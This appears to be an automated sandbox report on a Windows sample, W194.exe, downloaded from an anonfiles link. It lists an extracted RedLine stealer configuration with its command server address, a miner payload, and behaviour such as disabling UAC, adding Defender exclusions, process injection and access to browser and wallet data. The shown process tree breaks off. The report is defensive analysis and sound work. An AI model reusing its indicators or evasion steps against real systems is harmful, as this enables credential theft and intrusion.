Analysis
-
max time kernel
271s -
max time network
270s -
platform
windows10-2004_x64 -
resource
win10v2004-20220812-en -
resource tags
arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system -
submitted
24-09-2022 21:05
Static task
static1
URLScan task
urlscan1
Behavioral task
behavioral1
Sample
https://anonfiles.com/CcGeB49byb/W194_exe
Resource
win7-20220812-en
General
Malware Config
Extracted
redline
W194
77.73.134.2:4427
-
auth_value
229c668cb9353e36290ab5b500224232
Signatures
-
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
Suspicious use of NtCreateUserProcessOtherParentProcess 2 IoCs
Processes:
svchost.exedescription pid process target process PID 2560 created 632 2560 svchost.exe AdvancedRun.exe PID 2560 created 632 2560 svchost.exe AdvancedRun.exe -
Processes:
W194.exedescription ioc process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" W194.exe -
Processes:
W194.exedescription ioc process Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Exclusions\Extensions W194.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Exclusions\Extensions\exe = "1" W194.exe Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Exclusions\Paths W194.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\RarSFX0\W194.exe = "0" W194.exe -
Nirsoft 2 IoCs
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\fffb6a92-d296-430f-9af4-3fc6dc3074eb\AdvancedRun.exe Nirsoft C:\Users\Admin\AppData\Local\Temp\fffb6a92-d296-430f-9af4-3fc6dc3074eb\AdvancedRun.exe Nirsoft -
XMRig Miner payload 1 IoCs
Processes:
resource yara_rule behavioral2/memory/3592-239-0x00007FF68F900000-0x00007FF690A6F000-memory.dmp xmrig -
Downloads MZ/PE file
-
Executes dropped EXE 9 IoCs
Processes:
W194.exe1.exeupdater.exeW194.exesihost64.exeexplorer.exe1547eed8-16e3-4e9a-8b50-91ebc91be6a1.exeAdvancedRun.exeW194.exepid process 4236 W194.exe 2096 1.exe 3252 updater.exe 4640 W194.exe 5056 sihost64.exe 3592 explorer.exe 3612 1547eed8-16e3-4e9a-8b50-91ebc91be6a1.exe 632 AdvancedRun.exe 2984 W194.exe -
Checks BIOS information in registry 2 TTPs 8 IoCs
BIOS information is often read in order to detect sandboxing environments.
Processes:
1.exeupdater.exesihost64.exeexplorer.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 1.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion updater.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion updater.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion sihost64.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion sihost64.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion explorer.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion explorer.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 1.exe -
Checks computer location settings 2 TTPs 4 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
W194.exe1.exeupdater.exeW194.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation W194.exe Key value queried \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation 1.exe Key value queried \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation updater.exe Key value queried \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation W194.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Processes:
W194.exedescription ioc process Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\RarSFX0\W194.exe = "0" W194.exe Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Exclusions\Extensions W194.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Exclusions\Extensions\exe = "1" W194.exe Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Exclusions\Paths W194.exe Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Exclusions W194.exe -
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Processes:
W194.exedescription ioc process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA W194.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" W194.exe -
Suspicious use of SetThreadContext 2 IoCs
Processes:
updater.exeW194.exedescription pid process target process PID 3252 set thread context of 3592 3252 updater.exe explorer.exe PID 4640 set thread context of 2984 4640 W194.exe W194.exe -
Drops file in Windows directory 1 IoCs
Processes:
W194.exedescription ioc process File created C:\Windows\Microsoft.NET\Framework\v4.0.30319\_0xD8akars.raw W194.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Checks SCSI registry key(s) 3 TTPs 3 IoCs
SCSI information is often read in order to detect sandboxing environments.
Processes:
taskmgr.exedescription ioc process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000 taskmgr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A taskmgr.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName taskmgr.exe -
Modifies Internet Explorer Phishing Filter 1 TTPs 2 IoCs
Processes:
iexplore.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Software\Microsoft\Internet Explorer\PhishingFilter iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Internet Explorer\PhishingFilter\ClientSupported_MigrationTime = e8baa059b9aed801 iexplore.exe -
Processes:
iexplore.exeIEXPLORE.EXEdescription ioc process Key created \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Software\Microsoft\Internet Explorer\Main iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Internet Explorer\DOMStorage\anonfiles.com\NumberOfSubdomains = "1" IEXPLORE.EXE Set value (data) \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Internet Explorer\TypedURLsTime\url3 = 0000000000000000 iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Internet Explorer\TypedURLs\url5 = "https://login.live.com/" iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Internet Explorer\TypedURLsTime\url5 = 0000000000000000 iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Internet Explorer\DOMStorage\anonfiles.com IEXPLORE.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Internet Explorer\TypedURLs\url1 = "https://cdn-117.anonfiles.com/CcGeB49byb/a7d1a1d1-1664054102/W194.exe" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastUpdateLowDateTime = "774599076" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastUpdateLowDateTime = "827319395" IEXPLORE.EXE Set value (int) \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateLowDateTime = "774599076" iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FullScreen = "no" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Software\Microsoft\Internet Explorer\DOMStorage\anonfiles.com IEXPLORE.EXE Set value (data) \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Internet Explorer\TypedURLsTime\url1 = 05d468286ad0d801 iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Internet Explorer\TypedURLsTime\url6 = 0000000000000000 iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastUpdateHighDateTime = "30986346" iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Internet Explorer\RepId\PublicId = "{27454A33-9C47-4CB8-8876-A2E0B4F6F0F3}" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Internet Explorer\DomainSuggestion\FileNames iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Software\Microsoft\Internet Explorer\TypedURLs iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Internet Explorer\TypedURLs\url3 = "https://login.aliexpress.com/" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Software\Microsoft\Internet Explorer\IESettingSync iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Internet Explorer\Recovery\AdminActive\{567512C3-3C5D-11ED-B696-D2371B4A40BE} = "0" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Internet Explorer\IESettingSync\SlowSettingTypesChanged = "6" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser IEXPLORE.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Internet Explorer\DomainSuggestion\FileNames\en-US = "en-US.1" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateLowDateTime = "827319395" IEXPLORE.EXE Set value (int) \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateHighDateTime = "30986346" IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Internet Explorer\DomainSuggestion\FileNames\ iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Internet Explorer\TypedURLsTime\url2 = 0000000000000000 iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Internet Explorer\TypedURLs\url4 = "https://signin.ebay.com/ws/ebayisapi.dll" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastTTLHighDateTime = "50" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Software\Microsoft\Internet Explorer\TypedURLsTime iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Internet Explorer\DomainSuggestion\NextUpdateDate = "370825688" iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Internet Explorer\TypedURLs\url6 = "https://twitter.com/" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Internet Explorer\DOMStorage IEXPLORE.EXE Set value (int) \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Internet Explorer\Toolbar\WebBrowser\ITBar7Height = "21" IEXPLORE.EXE Set value (int) \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateHighDateTime = "30986346" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Software\Microsoft\Internet Explorer\Toolbar IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Internet Explorer\DomainSuggestion iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames\ iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Internet Explorer\Toolbar\WebBrowser\ITBar7Height = "0" IEXPLORE.EXE Set value (data) \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000 iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Software\Microsoft\Internet Explorer\Main IEXPLORE.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Internet Explorer\TypedURLs\url2 = "https://www.facebook.com/" iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Internet Explorer\TypedURLsTime\url4 = 0000000000000000 iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastUpdateHighDateTime = "30986346" IEXPLORE.EXE Set value (int) \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastTTLLowDateTime = "1251635200" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Software\Microsoft\Internet Explorer\VersionManager IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Software\Microsoft\Internet Explorer\DomainSuggestion iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Software\Microsoft\Internet Explorer\RepId iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Software\Microsoft\Internet Explorer\VersionManager iexplore.exe -
Modifies registry class 1 IoCs
Processes:
IEXPLORE.EXEdescription ioc process Key created \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-2629973501-4017243118-3254762364-1000\{B48CC7B9-D078-4566-848C-AB5834B21D84} IEXPLORE.EXE -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
powershell.exe1.exepowershell.exeW194.exeAdvancedRun.exepowershell.exepowershell.exepowershell.exeW194.exeexplorer.exetaskmgr.exepid process 2032 powershell.exe 2032 powershell.exe 2096 1.exe 4784 powershell.exe 4784 powershell.exe 4640 W194.exe 4640 W194.exe 4640 W194.exe 4640 W194.exe 632 AdvancedRun.exe 632 AdvancedRun.exe 632 AdvancedRun.exe 632 AdvancedRun.exe 4640 W194.exe 4640 W194.exe 4640 W194.exe 4640 W194.exe 1460 powershell.exe 1460 powershell.exe 2088 powershell.exe 2088 powershell.exe 1404 powershell.exe 1404 powershell.exe 2088 powershell.exe 1460 powershell.exe 1404 powershell.exe 4640 W194.exe 4640 W194.exe 2984 W194.exe 2984 W194.exe 2984 W194.exe 3592 explorer.exe 3592 explorer.exe 3592 explorer.exe 3592 explorer.exe 3592 explorer.exe 3592 explorer.exe 3592 explorer.exe 3592 explorer.exe 3592 explorer.exe 3592 explorer.exe 3592 explorer.exe 3592 explorer.exe 3592 explorer.exe 3592 explorer.exe 3592 explorer.exe 3592 explorer.exe 3316 taskmgr.exe 3316 taskmgr.exe 3592 explorer.exe 3592 explorer.exe 3316 taskmgr.exe 3316 taskmgr.exe 3592 explorer.exe 3592 explorer.exe 3316 taskmgr.exe 3592 explorer.exe 3592 explorer.exe 3316 taskmgr.exe 3316 taskmgr.exe 3592 explorer.exe 3592 explorer.exe 3316 taskmgr.exe 3592 explorer.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
Processes:
iexplore.exepid process 1704 iexplore.exe -
Suspicious behavior: LoadsDriver 1 IoCs
Processes:
pid process 648 -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
powershell.exedescription pid process Token: SeDebugPrivilege 2032 powershell.exe Token: SeIncreaseQuotaPrivilege 2032 powershell.exe Token: SeSecurityPrivilege 2032 powershell.exe Token: SeTakeOwnershipPrivilege 2032 powershell.exe Token: SeLoadDriverPrivilege 2032 powershell.exe Token: SeSystemProfilePrivilege 2032 powershell.exe Token: SeSystemtimePrivilege 2032 powershell.exe Token: SeProfSingleProcessPrivilege 2032 powershell.exe Token: SeIncBasePriorityPrivilege 2032 powershell.exe Token: SeCreatePagefilePrivilege 2032 powershell.exe Token: SeBackupPrivilege 2032 powershell.exe Token: SeRestorePrivilege 2032 powershell.exe Token: SeShutdownPrivilege 2032 powershell.exe Token: SeDebugPrivilege 2032 powershell.exe Token: SeSystemEnvironmentPrivilege 2032 powershell.exe Token: SeRemoteShutdownPrivilege 2032 powershell.exe Token: SeUndockPrivilege 2032 powershell.exe Token: SeManageVolumePrivilege 2032 powershell.exe Token: 33 2032 powershell.exe Token: 34 2032 powershell.exe Token: 35 2032 powershell.exe Token: 36 2032 powershell.exe Token: SeIncreaseQuotaPrivilege 2032 powershell.exe Token: SeSecurityPrivilege 2032 powershell.exe Token: SeTakeOwnershipPrivilege 2032 powershell.exe Token: SeLoadDriverPrivilege 2032 powershell.exe Token: SeSystemProfilePrivilege 2032 powershell.exe Token: SeSystemtimePrivilege 2032 powershell.exe Token: SeProfSingleProcessPrivilege 2032 powershell.exe Token: SeIncBasePriorityPrivilege 2032 powershell.exe Token: SeCreatePagefilePrivilege 2032 powershell.exe Token: SeBackupPrivilege 2032 powershell.exe Token: SeRestorePrivilege 2032 powershell.exe Token: SeShutdownPrivilege 2032 powershell.exe Token: SeDebugPrivilege 2032 powershell.exe Token: SeSystemEnvironmentPrivilege 2032 powershell.exe Token: SeRemoteShutdownPrivilege 2032 powershell.exe Token: SeUndockPrivilege 2032 powershell.exe Token: SeManageVolumePrivilege 2032 powershell.exe Token: 33 2032 powershell.exe Token: 34 2032 powershell.exe Token: 35 2032 powershell.exe Token: 36 2032 powershell.exe Token: SeIncreaseQuotaPrivilege 2032 powershell.exe Token: SeSecurityPrivilege 2032 powershell.exe Token: SeTakeOwnershipPrivilege 2032 powershell.exe Token: SeLoadDriverPrivilege 2032 powershell.exe Token: SeSystemProfilePrivilege 2032 powershell.exe Token: SeSystemtimePrivilege 2032 powershell.exe Token: SeProfSingleProcessPrivilege 2032 powershell.exe Token: SeIncBasePriorityPrivilege 2032 powershell.exe Token: SeCreatePagefilePrivilege 2032 powershell.exe Token: SeBackupPrivilege 2032 powershell.exe Token: SeRestorePrivilege 2032 powershell.exe Token: SeShutdownPrivilege 2032 powershell.exe Token: SeDebugPrivilege 2032 powershell.exe Token: SeSystemEnvironmentPrivilege 2032 powershell.exe Token: SeRemoteShutdownPrivilege 2032 powershell.exe Token: SeUndockPrivilege 2032 powershell.exe Token: SeManageVolumePrivilege 2032 powershell.exe Token: 33 2032 powershell.exe Token: 34 2032 powershell.exe Token: 35 2032 powershell.exe Token: 36 2032 powershell.exe -
Suspicious use of FindShellTrayWindow 37 IoCs
Processes:
iexplore.exetaskmgr.exepid process 1704 iexplore.exe 1704 iexplore.exe 3316 taskmgr.exe 3316 taskmgr.exe 3316 taskmgr.exe 3316 taskmgr.exe 3316 taskmgr.exe 3316 taskmgr.exe 3316 taskmgr.exe 3316 taskmgr.exe 3316 taskmgr.exe 3316 taskmgr.exe 3316 taskmgr.exe 3316 taskmgr.exe 3316 taskmgr.exe 3316 taskmgr.exe 3316 taskmgr.exe 3316 taskmgr.exe 3316 taskmgr.exe 3316 taskmgr.exe 3316 taskmgr.exe 3316 taskmgr.exe 3316 taskmgr.exe 3316 taskmgr.exe 3316 taskmgr.exe 3316 taskmgr.exe 3316 taskmgr.exe 3316 taskmgr.exe 3316 taskmgr.exe 3316 taskmgr.exe 3316 taskmgr.exe 3316 taskmgr.exe 3316 taskmgr.exe 3316 taskmgr.exe 3316 taskmgr.exe 3316 taskmgr.exe 3316 taskmgr.exe -
Suspicious use of SendNotifyMessage 35 IoCs
Processes:
taskmgr.exepid process 3316 taskmgr.exe 3316 taskmgr.exe 3316 taskmgr.exe 3316 taskmgr.exe 3316 taskmgr.exe 3316 taskmgr.exe 3316 taskmgr.exe 3316 taskmgr.exe 3316 taskmgr.exe 3316 taskmgr.exe 3316 taskmgr.exe 3316 taskmgr.exe 3316 taskmgr.exe 3316 taskmgr.exe 3316 taskmgr.exe 3316 taskmgr.exe 3316 taskmgr.exe 3316 taskmgr.exe 3316 taskmgr.exe 3316 taskmgr.exe 3316 taskmgr.exe 3316 taskmgr.exe 3316 taskmgr.exe 3316 taskmgr.exe 3316 taskmgr.exe 3316 taskmgr.exe 3316 taskmgr.exe 3316 taskmgr.exe 3316 taskmgr.exe 3316 taskmgr.exe 3316 taskmgr.exe 3316 taskmgr.exe 3316 taskmgr.exe 3316 taskmgr.exe 3316 taskmgr.exe -
Suspicious use of SetWindowsHookEx 12 IoCs
Processes:
iexplore.exeIEXPLORE.EXEpid process 1704 iexplore.exe 1704 iexplore.exe 4544 IEXPLORE.EXE 4544 IEXPLORE.EXE 4544 IEXPLORE.EXE 4544 IEXPLORE.EXE 1704 iexplore.exe 4544 IEXPLORE.EXE 4544 IEXPLORE.EXE 4544 IEXPLORE.EXE 4544 IEXPLORE.EXE 4544 IEXPLORE.EXE -
Suspicious use of WriteProcessMemory 48 IoCs
Processes:
iexplore.exeW194.exe1.execmd.exeupdater.exeW194.exesvchost.exedescription pid process target process PID 1704 wrote to memory of 4544 1704 iexplore.exe IEXPLORE.EXE PID 1704 wrote to memory of 4544 1704 iexplore.exe IEXPLORE.EXE PID 1704 wrote to memory of 4544 1704 iexplore.exe IEXPLORE.EXE PID 1704 wrote to memory of 4236 1704 iexplore.exe W194.exe PID 1704 wrote to memory of 4236 1704 iexplore.exe W194.exe PID 1704 wrote to memory of 4236 1704 iexplore.exe W194.exe PID 4236 wrote to memory of 2096 4236 W194.exe 1.exe PID 4236 wrote to memory of 2096 4236 W194.exe 1.exe PID 2096 wrote to memory of 2032 2096 1.exe powershell.exe PID 2096 wrote to memory of 2032 2096 1.exe powershell.exe PID 2096 wrote to memory of 3796 2096 1.exe cmd.exe PID 2096 wrote to memory of 3796 2096 1.exe cmd.exe PID 3796 wrote to memory of 660 3796 cmd.exe schtasks.exe PID 3796 wrote to memory of 660 3796 cmd.exe schtasks.exe PID 3252 wrote to memory of 4784 3252 updater.exe powershell.exe PID 3252 wrote to memory of 4784 3252 updater.exe powershell.exe PID 4236 wrote to memory of 4640 4236 W194.exe W194.exe PID 4236 wrote to memory of 4640 4236 W194.exe W194.exe PID 4236 wrote to memory of 4640 4236 W194.exe W194.exe PID 3252 wrote to memory of 5056 3252 updater.exe sihost64.exe PID 3252 wrote to memory of 5056 3252 updater.exe sihost64.exe PID 3252 wrote to memory of 3592 3252 updater.exe explorer.exe PID 3252 wrote to memory of 3592 3252 updater.exe explorer.exe PID 3252 wrote to memory of 3592 3252 updater.exe explorer.exe PID 4640 wrote to memory of 3612 4640 W194.exe 1547eed8-16e3-4e9a-8b50-91ebc91be6a1.exe PID 4640 wrote to memory of 3612 4640 W194.exe 1547eed8-16e3-4e9a-8b50-91ebc91be6a1.exe PID 4640 wrote to memory of 632 4640 W194.exe AdvancedRun.exe PID 4640 wrote to memory of 632 4640 W194.exe AdvancedRun.exe PID 4640 wrote to memory of 632 4640 W194.exe AdvancedRun.exe PID 4640 wrote to memory of 2088 4640 W194.exe powershell.exe PID 4640 wrote to memory of 2088 4640 W194.exe powershell.exe PID 4640 wrote to memory of 2088 4640 W194.exe powershell.exe PID 4640 wrote to memory of 1460 4640 W194.exe powershell.exe PID 4640 wrote to memory of 1460 4640 W194.exe powershell.exe PID 4640 wrote to memory of 1460 4640 W194.exe powershell.exe PID 4640 wrote to memory of 1404 4640 W194.exe powershell.exe PID 4640 wrote to memory of 1404 4640 W194.exe powershell.exe PID 4640 wrote to memory of 1404 4640 W194.exe powershell.exe PID 2560 wrote to memory of 3420 2560 svchost.exe cmd.exe PID 2560 wrote to memory of 3420 2560 svchost.exe cmd.exe PID 4640 wrote to memory of 2984 4640 W194.exe W194.exe PID 4640 wrote to memory of 2984 4640 W194.exe W194.exe PID 4640 wrote to memory of 2984 4640 W194.exe W194.exe PID 4640 wrote to memory of 2984 4640 W194.exe W194.exe PID 4640 wrote to memory of 2984 4640 W194.exe W194.exe PID 4640 wrote to memory of 2984 4640 W194.exe W194.exe PID 4640 wrote to memory of 2984 4640 W194.exe W194.exe PID 4640 wrote to memory of 2984 4640 W194.exe W194.exe -
System policy modification 1 TTPs 1 IoCs
Processes:
W194.exedescription ioc process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" W194.exe
Processes
-
C:\Program Files\Internet Explorer\iexplore.exe"C:\Program Files\Internet Explorer\iexplore.exe" https://anonfiles.com/CcGeB49byb/W194_exe1⤵
- Modifies Internet Explorer Phishing Filter
- Modifies Internet Explorer settings
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1704 CREDAT:17410 /prefetch:22⤵
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\48VMALJK\W194.exe"C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\48VMALJK\W194.exe"2⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\1.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX0\1.exe"3⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks computer location settings
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
